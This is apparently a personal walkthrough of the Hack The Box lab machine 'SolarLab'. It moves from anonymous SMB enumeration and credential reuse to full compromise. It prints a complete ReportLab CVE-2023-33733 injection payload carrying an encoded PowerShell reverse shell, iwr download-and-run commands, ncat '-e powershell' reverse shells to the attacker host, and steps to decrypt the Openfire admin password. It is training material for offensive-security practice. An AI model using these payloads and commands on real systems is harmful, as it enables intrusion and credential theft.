SolarLab

Recon

└─$ tail -1 /etc/hosts
10.10.11.16     solarlab.htb

SMB

└─$ netexec smb solarlab.htb -u '' -p '' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [-] solarlab\: STATUS_ACCESS_DENIED
SMB         10.10.11.16     445    SOLARLAB         [-] Error getting user: list index out of range
SMB         10.10.11.16     445    SOLARLAB         [-] Error enumerating shares: Error occurs while reading from remote(104)

└─$ netexec smb solarlab.htb -u 'anonymous' -p '' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab\anonymous:
SMB         10.10.11.16     445    SOLARLAB         [*] Enumerated shares
SMB         10.10.11.16     445    SOLARLAB         Share           Permissions     Remark
SMB         10.10.11.16     445    SOLARLAB         -----           -----------     ------
SMB         10.10.11.16     445    SOLARLAB         ADMIN$                          Remote Admin
SMB         10.10.11.16     445    SOLARLAB         C$                              Default share
SMB         10.10.11.16     445    SOLARLAB         Documents       READ
SMB         10.10.11.16     445    SOLARLAB         IPC$            READ            Remote IPC

└─$ smbclient -U anonymous --no-pass //solarlab.htb/Documents
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Apr 26 10:47:14 2024
  ..                                 DR        0  Fri Apr 26 10:47:14 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

                7779839 blocks of size 4096. 1790217 blocks available
smb: \> recurse
smb: \> dir
  .                                  DR        0  Fri Apr 26 10:47:14 2024
  ..                                 DR        0  Fri Apr 26 10:47:14 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

\concepts
  .                                   D        0  Fri Apr 26 10:41:57 2024
  ..                                  D        0  Fri Apr 26 10:41:57 2024
  Training-Request-Form.docx          A   161337  Fri Nov 17 05:46:57 2023
  Travel-Request-Sample.docx          A    30953  Fri Nov 17 05:36:54 2023

\My Music
NT_STATUS_ACCESS_DENIED listing \My Music\*

\My Pictures
NT_STATUS_ACCESS_DENIED listing \My Pictures\*

\My Videos
NT_STATUS_ACCESS_DENIED listing \My Videos\*
smb: \> prompt
smb: \> mget *
getting file \desktop.ini of size 278 as desktop.ini (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \details-file.xlsx of size 12793 as details-file.xlsx (30.4 KiloBytes/sec) (average 17.2 KiloBytes/sec)
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (73.2 KiloBytes/sec) (average 39.7 KiloBytes/sec)
getting file \concepts\Training-Request-Form.docx of size 161337 as concepts/Training-Request-Form.docx (138.9 KiloBytes/sec) (average 87.1 KiloBytes/sec)
getting file \concepts\Travel-Request-Sample.docx of size 30953 as concepts/Travel-Request-Sample.docx (29.9 KiloBytes/sec) (average 70.0 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \My Music\*
NT_STATUS_ACCESS_DENIED listing \My Pictures\*
NT_STATUS_ACCESS_DENIED listing \My Videos\*

Most of them are empty documents, except details-file, could be useful..

HTTP (80)

Nothing interesting on site itself, seems like a placeholder for service. feroxbuster didn't find anything and no subdomains was found with ffuf.

HTTP (6791)

When visiting port we are redirected to report subdomain.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ tail -1 /etc/hosts
10.10.11.16     solarlab.htb    report.solarlab.htb

After trying credentials from SMB excel document many of them don't work. ``

Username

Password

Alexander.knight@gmail.com

al;ksdhfewoiuh

KAlexander

dkjafblkjadsfgl

Alexander.knight@gmail.com

d398sadsknr390

blake.byte

ThisCanB3typedeasily1@

AlexanderK

danenacia9234n

ClaudiaS

dadsfawe9dafkn

Till AlexanderK it said username doesn't exist, but password didn't work neither for AlexanderK nor ClaudiaS. But if we observe names have pattern: {Firstname}{LastnameFirstChar}

Trying this on blake we are able to login: BlakeB:ThisCanB3typedeasily1@

If we generate any report we get:

https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897CVE-2023-33733 PoC

User input is limiting us to 300 characters and with this payload that's nearly impossible. We can use other fields, but what was weird is that server was giving 500 and I wanted to see any output. If we start listener and fire the reverse shell we are able to catch it even if server returns 500. Reverse shell from https://www.revshells.com

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.16:62793.
whoami
solarlab\blake
PS C:\Users\blake\Documents\app>

C:\Users\blake\Documents\app\reports\instance\users.db:

username

password

BlakeB

ClaudiaS

AlexanderK

ClaudiaS

blakeb

ThisCanB3typedeasily1@

claudias

007poiuytrewq

alexanderk

HotP!fireguard

PS C:\users\blake> tree /f
Folder PATH listing
Volume serial number is 385E-AC57
C:.
????Desktop
?       user.txt
????Documents
?   ?   start-app.bat
?   ????app
?       ?   app.py
?       ?   models.py
?       ?   routes.py
?       ?   utils.py
?       ?
?       ????instance
?       ?       users.db
?       ?
?       ????reports
?       ?   ?   file.jpg
?       ?   ?
?       ?   ????instance
?       ?           users.db

User.txt

PS C:\users\blake> cat desktop/user.txt
65214e8f8b87c116b3b226200dee9383

Privilege Escalation

Running winPeas:

winPeas didn't show the ports running on localhost:

PS C:\users\public> Get-NetTCPConnection -State Listen -Localaddress 127.0.0.1

LocalAddress                        LocalPort RemoteAddress                       RemotePort State       AppliedSetting
------------                        --------- -------------                       ---------- -----       --------------
127.0.0.1                           9091      0.0.0.0                             0          Listen
127.0.0.1                           9090      0.0.0.0                             0          Listen
127.0.0.1                           7443      0.0.0.0                             0          Listen
127.0.0.1                           7070      0.0.0.0                             0          Listen
127.0.0.1                           5276      0.0.0.0                             0          Listen
127.0.0.1                           5275      0.0.0.0                             0          Listen
127.0.0.1                           5270      0.0.0.0                             0          Listen
127.0.0.1                           5269      0.0.0.0                             0          Listen
127.0.0.1                           5263      0.0.0.0                             0          Listen
127.0.0.1                           5262      0.0.0.0                             0          Listen
127.0.0.1                           5223      0.0.0.0                             0          Listen
127.0.0.1                           5222      0.0.0.0                             0          Listen
127.0.0.1                           5000      0.0.0.0                             0          Listen

I saw people using Chisel to forward the traffic from box to their machines, more about Tunneling

First of all use ConPtyShell to get a stable shell.

Privilege Escalation (openfire)

I somewhat gave up on ports for some time and tried my luck with runas, winrm failed but that's because the service isn't active. Using runas we can switch users:

PS C:\users> runas /user:openfire cmd
Enter the password for openfire: HotP!fireguard
Attempting to start cmd as user "SOLARLAB\openfire" ...
PS C:\users> whoami
solarlab\blake
PS C:\users> runas /user:openfire cmd
Enter the password for openfire: something wrong
Attempting to start cmd as user "SOLARLAB\openfire" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

The shell wasn't started, but password is confirmed to be true. The reason it failed was because UAC is in place and from shell we can't do anything about it.

PS C:\users> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
	...
    EnableLUA    REG_DWORD    0x1
	...

Upload RunasCs.exe:

PS C:\Users\blake\AppData\Local\Temp> iwr http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Users\blake\AppData\Local\Temp> .\rc.exe openfire HotP!fireguard whoami -b
solarlab\openfire
PS C:\Users\blake\AppData\Local\Temp> iwr http://10.10.16.74/ncat.exe -outfile nc.exe
PS C:\Users\blake\AppData\Local\Temp> .\rc.exe openfire HotP!fireguard "C:\Users\blake\AppData\Local\Temp\nc.exe 10.10.16.74 4444 -e powershell" -b
[-] RunasCsException: CreateProcessWithLogonWUacBypass failed with error code: Access is denied
PS C:\Users\blake\AppData\Local\Temp> cd /Users/Public
PS C:\Users\Public> cp C:\Users\blake\AppData\Local\Temp\nc.exe .
PS C:\Users\Public> C:\Users\blake\AppData\Local\Temp\rc.exe openfire HotP!fireguard "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -b

User openfire doesn't have access to our directory so RunasCs fails to execute, but we can use /Users/Public which is accessible to most users.

During my enumeration I saw an openfire directory in Program Files, since username and dir name is same let's check it out.

└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.16:54255.

PS C:\Windows\system32> whoami
whoami
solarlab\openfire
PS C:\Program Files\openfire\conf> cat security.xml
...
  <!--
  Any other property defined in this file will be treated as an encrypted
  property. The value (in clear text) will be encrypted and migrated into
  the Openfire database during the next startup. The property name will
  be added to the list of encrypted properties and the clear text value
  will be removed from this file.

  <foo><bar>Secr3t$tr1ng!</bar></foo>
...
PS C:\Program Files\openfire> cat changelog.html | sls "<h2>.* -- <span" | select -first 5
cat changelog.html | sls "<h2>.* -- <span" | select -first 5

<h2>4.7.4 -- <span style="font-weight: normal;">November 9, 2022</span></h2>
<h2>4.7.3 -- <span style="font-weight: normal;">August 2, 2022</span></h2>
<h2>4.7.2 -- <span style="font-weight: normal;">July 13, 2022</span></h2>
<h2>4.7.1 -- <span style="font-weight: normal;">February 16, 2022</span></h2>
<h2>4.7.0 -- <span style="font-weight: normal;">January 19, 2022</span></h2>

https://www.cybersecurity-help.cz/vdb/ignite_realtime/openfire/4.7.4/ https://www.cybersecurity-help.cz/vdb/SB2023052418

Not interesting, since we are already on the machine and have access to source

Privilege Escalation (Administrator)

PS C:\Program Files\openfire\embedded-db> cat openfire.script
...
CREATE MEMORY TABLE PUBLIC.OFUSER(
	 USERNAME VARCHAR(64) NOT NULL
	,STOREDKEY VARCHAR(32)
	,SERVERKEY VARCHAR(32)
	,SALT VARCHAR(32)
	,ITERATIONS INTEGER
	,PLAINPASSWORD VARCHAR(32)
	,ENCRYPTEDPASSWORD VARCHAR(255)
	,NAME VARCHAR(100)
	,EMAIL VARCHAR(100)
	,CREATIONDATE VARCHAR(15) NOT NULL
	,MODIFICATIONDATE VARCHAR(15) NOT NULL
	,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME)
)
...
INSERT INTO OFUSER VALUES(
	 'admin'
	,'gjMoswpK+HakPdvLIvp6eLKlYh0='
	,'9MwNQcJ9bF4YeyZDdns5gvXp620='
	,'yidQk5Skw11QJWTBAloAb28lYHftqa0x'
	,4096
	,NULL
	,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442'
	,'Administrator'
	,'admin@solarlab.htb'
	,'001700223740785'
	,'0'
)
...
CREATE MEMORY TABLE PUBLIC.OFPROPERTY(
	 NAME VARCHAR(100) NOT NULL
	,PROPVALUE VARCHAR(4000) NOT NULL
	,ENCRYPTED INTEGER
	,IV CHARACTER(24)
	,CONSTRAINT OFPROPERTY_PK PRIMARY KEY(NAME)
)
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
...

While looking for a way to decrypt the hash I came over Hashcat forum which explained how it works, with code to decrypt it. openfire hash

Had a quick look at what OpenFire does and it is basically true what we said, but it does use SHA1 AND blowfish, basically. What one needs to have to decrypt the encrypted password (yes, they are encrypted not hashed, but there is also a SHA1 hash of the passwordKey field involved) is a passwordKey + the encrypted password. The first 8 bytes (16 chars, 8 hex) of the encrypted password is the initialization vector, the blowfish CBC key is stored in the database as "passwordKey" (<- this is SHA1 hashed before used as key to blowfish CBC).

Script: [[OpenFireDecryptPass.java]]

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ javac OpenFireDecryptPass.java # Compile java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ java OpenFireDecryptPass # Run java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[-] Please specify the encypted password and the "passwordKey"

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ java OpenFireDecryptPass becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)

I messed up big time here, openfire user doesn't have access to blake directory so I had to redowload the file since I was disconnected too. Note to the future: use directory where everyone has fucking access...

PS C:\Users\openfire\AppData\Local\Temp> iwr http://10.10.16.74/rc.exe -outfile rc.exe
iwr http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Users\openfire\AppData\Local\Temp> .\rc.exe Administrator ThisPasswordShouldDo!@ "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -b
.\rc.exe Administrator ThisPasswordShouldDo!@ "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -b

Root.txt

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.16:50530.
PS C:\Windows\system32> whoami
solarlab\administrator
PS C:\Users\Administrator\Desktop> cat root.txt
cat root.txt
2c30666cd35226b4a5f36f20a61ea77d

Writeups Referenced: https://medium.com/@Null0X0/solarlab-machine-htb-season-5-walkthrough-writeup-0be6c53a467a https://medium.com/@mjd.jellali/hackthebox-solarlab-walkthrough-5c9bd1bdcdb1

PreviousRunner NextSeason 6

Last updated 7 months ago

hashtagRecon

hashtagSMB

hashtagHTTP (80)

hashtagHTTP (6791)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagPrivilege Escalation (openfire)

hashtagPrivilege Escalation (Administrator)

hashtagRoot.txt

Recon

SMB

HTTP (80)

HTTP (6791)

User.txt

Privilege Escalation

Privilege Escalation (openfire)

Privilege Escalation (Administrator)

Root.txt